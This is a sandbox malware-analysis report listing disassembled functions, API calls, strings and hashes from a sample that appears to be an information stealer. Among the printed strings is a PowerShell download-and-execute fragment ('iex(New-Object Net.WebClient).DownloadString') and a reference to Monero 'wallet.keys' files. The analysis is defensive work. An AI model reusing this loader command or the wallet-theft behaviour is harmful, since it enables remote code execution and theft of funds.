                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: 9c177e8f5d28da45ca408c727563ef8e13e34e7ec622b35fd97656c4585c657f
                      • Instruction ID: 3cb536422bacb4f73bcb0e9cbc9ff35f50cc5eeff82084a86e9b04a7fa2b350f
                      • Opcode Fuzzy Hash: 9c177e8f5d28da45ca408c727563ef8e13e34e7ec622b35fd97656c4585c657f
                      • Instruction Fuzzy Hash: F041F171D50208EAEB15FFA0C89ABEDB778EF14304F504029F416A7192DF782A4ACF91
                      Function 00739E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                      Download Yara Rule
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00739F41
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: 967c9bd821a8c08eedc755fd1605c12da44b4000b7b4b5f866a9b7dee07b941a
                      • Instruction ID: bb928b9302f9041c71f0d4cb046d3ca0a980c8467cb2053191fa9232e0d6603b
                      • Opcode Fuzzy Hash: 967c9bd821a8c08eedc755fd1605c12da44b4000b7b4b5f866a9b7dee07b941a
                      • Instruction Fuzzy Hash: CF613771A50248EFEB24EFA4CC9AFED7775AF44304F408118F90A5F192EB786A05CB91
                      Function 007440B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,013ED478,00000000,00020119,?), ref: 007440F4
                      • RegQueryValueExA.ADVAPI32(?,013ED880,00000000,00000000,00000000,000000FF), ref: 00744118
                      • RegCloseKey.ADVAPI32(?), ref: 00744122
                      • lstrcat.KERNEL32(?,00000000), ref: 00744147
                      • lstrcat.KERNEL32(?,013ED8C8), ref: 0074415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValue
                      • String ID:
                      • API String ID: 690832082-0
                      • Opcode ID: 26fcee0180b8b2f4b02a00c1e5bca89d2f3c0da412c006d9c85a62949396b1db
                      • Instruction ID: c90f3ccf7efdc5107f545acb5b9392df3e629f02a51908e8ad69e3a794179a89
                      • Opcode Fuzzy Hash: 26fcee0180b8b2f4b02a00c1e5bca89d2f3c0da412c006d9c85a62949396b1db
                      • Instruction Fuzzy Hash: F74148B7D10108ABDB14FBA0DC5AFFE737DAB88300F404558B62996181EA755BD88B92
                      Function 00747E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00747E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,013DB7A8,00000000,00020119,?), ref: 00747E5E
                      • RegQueryValueExA.ADVAPI32(?,013ED718,00000000,00000000,000000FF,000000FF), ref: 00747E7F
                      • RegCloseKey.ADVAPI32(?), ref: 00747E92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: 5ed2b5f72ad23cb4075a48ad98a0e71a146f95b5b03804fc41e0af18516983fb
                      • Instruction ID: 565838a3f15e9f8a2e4cf7f7572c4596fc484d35a4b6abe0e6d492e9db489cdb
                      • Opcode Fuzzy Hash: 5ed2b5f72ad23cb4075a48ad98a0e71a146f95b5b03804fc41e0af18516983fb
                      • Instruction Fuzzy Hash: AC119EB2A48205EBD714CF94DC49FBFBBB8FB44B01F104259FA09A7280D7785800DBA2
                      Function 00749260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                      Download Yara Rule
                      APIs
                      • StrStrA.SHLWAPI(013ED820,?,?,?,0074140C,?,013ED820,00000000), ref: 0074926C
                      • lstrcpyn.KERNEL32(0097AB88,013ED820,013ED820,?,0074140C,?,013ED820), ref: 00749290
                      • lstrlen.KERNEL32(?,?,0074140C,?,013ED820), ref: 007492A7
                      • wsprintfA.USER32 ref: 007492C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: c39b6a032a55a14b41ed04f07b1266c42736f94b46b8b20a8eff38a3e8b8c59b
                      • Instruction ID: 3318c50862d2f62da51926661aedd7bbecff27418c6c1c34f0c499409a5b56f2
                      • Opcode Fuzzy Hash: c39b6a032a55a14b41ed04f07b1266c42736f94b46b8b20a8eff38a3e8b8c59b
                      • Instruction Fuzzy Hash: E401A976504208FFCB04DFE8C984EAE7BB9EB84365F108148F9099B204C675AA40DBD5
                      Function 007312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007312B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 007312BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007312D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007312F5
                      • RegCloseKey.ADVAPI32(?), ref: 007312FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: 94b0e5d0fafb07a18d03006327a6e705ffe999967dab6c2453d2a0b9c72a0a36
                      • Instruction ID: 35661ef61d7ec6be0127a40ad5e4a03b931feae88d6c7f610b25dc2ef12b2b0d
                      • Opcode Fuzzy Hash: 94b0e5d0fafb07a18d03006327a6e705ffe999967dab6c2453d2a0b9c72a0a36
                      • Instruction Fuzzy Hash: C70131BAA54208BBDB04DFE0DC49FAEB7B8EB88701F008159FA0997280D6749A419F51
                      Function 0074C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: String___crt$Type
                      • String ID:
                      • API String ID: 2109742289-3916222277
                      • Opcode ID: 969f6c6d2592dcda27a78e7ddc0b12b14b3c3f5a68f68c47f9beac00d14ef782
                      • Instruction ID: 69ff631d7f336cc485bd0e177b4997891bc6d248bf433756b28af0b1184147a9
                      • Opcode Fuzzy Hash: 969f6c6d2592dcda27a78e7ddc0b12b14b3c3f5a68f68c47f9beac00d14ef782
                      • Instruction Fuzzy Hash: 7F41E87150175CAFDB228B248D85FFBBBEC9F45704F1444E8E5CA86182E375AA448F60
                      Function 00746630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00746663
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00746726
                      • ExitProcess.KERNEL32 ref: 00746755
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: ffb7030ac472e1a47b8d8a49126af35adafbabece9eb81abcf1faf98daa4fab8
                      • Instruction ID: 2a9ae30dd6e8d55f1be46abb08b92907c9ac49bb0a70e3435452fecddbb71802
                      • Opcode Fuzzy Hash: ffb7030ac472e1a47b8d8a49126af35adafbabece9eb81abcf1faf98daa4fab8
                      • Instruction Fuzzy Hash: D2314DB2C51208EADB15EB50DC86BDD777CAF44300F404198F20966191DF786B88CF56
                      Function 007487C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00750E28,00000000,?), ref: 0074882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00748836
                      • wsprintfA.USER32 ref: 00748850
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: 034488dc9ab3a7bb2c8e4630d4156bd73c62dfc3ab6266d9a1064524eb27a7da
                      • Instruction ID: 8fd6ee9cf941b69272b4f7535935de876aea908a5dd703f80f5b78b9d81496f0
                      • Opcode Fuzzy Hash: 034488dc9ab3a7bb2c8e4630d4156bd73c62dfc3ab6266d9a1064524eb27a7da
                      • Instruction Fuzzy Hash: 042145B2E54204AFDB04DFD4DD45FAEB7B8FB48701F104159F509A7280C7795940DBA2
                      Function 00748D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0074951E,00000000), ref: 00748D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00748D62
                      • wsprintfW.USER32 ref: 00748D78
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: 2cbc273a3c1d7730ebe75bf894ac9ad8adca6ea56caa6d77b0f7b087854a1d72
                      • Instruction ID: fe229aea99fc32efd32934b0a17ca1cf4f5b38e2377af9f98e0e382cd0dfba5f
                      • Opcode Fuzzy Hash: 2cbc273a3c1d7730ebe75bf894ac9ad8adca6ea56caa6d77b0f7b087854a1d72
                      • Instruction Fuzzy Hash: 75E08CB2A54208BBC700DB94DC0AEAD77BCEB84702F040094FD0D87280DA75AE50ABA2
                      Function 0073A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 00748B60: GetSystemTime.KERNEL32(00750E1A,013E9998,007505AE,?,?,007313F9,?,0000001A,00750E1A,00000000,?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 00748B86
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073A2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 0073A3FF
                      • lstrlen.KERNEL32(00000000), ref: 0073A6BC
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 0073A743
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
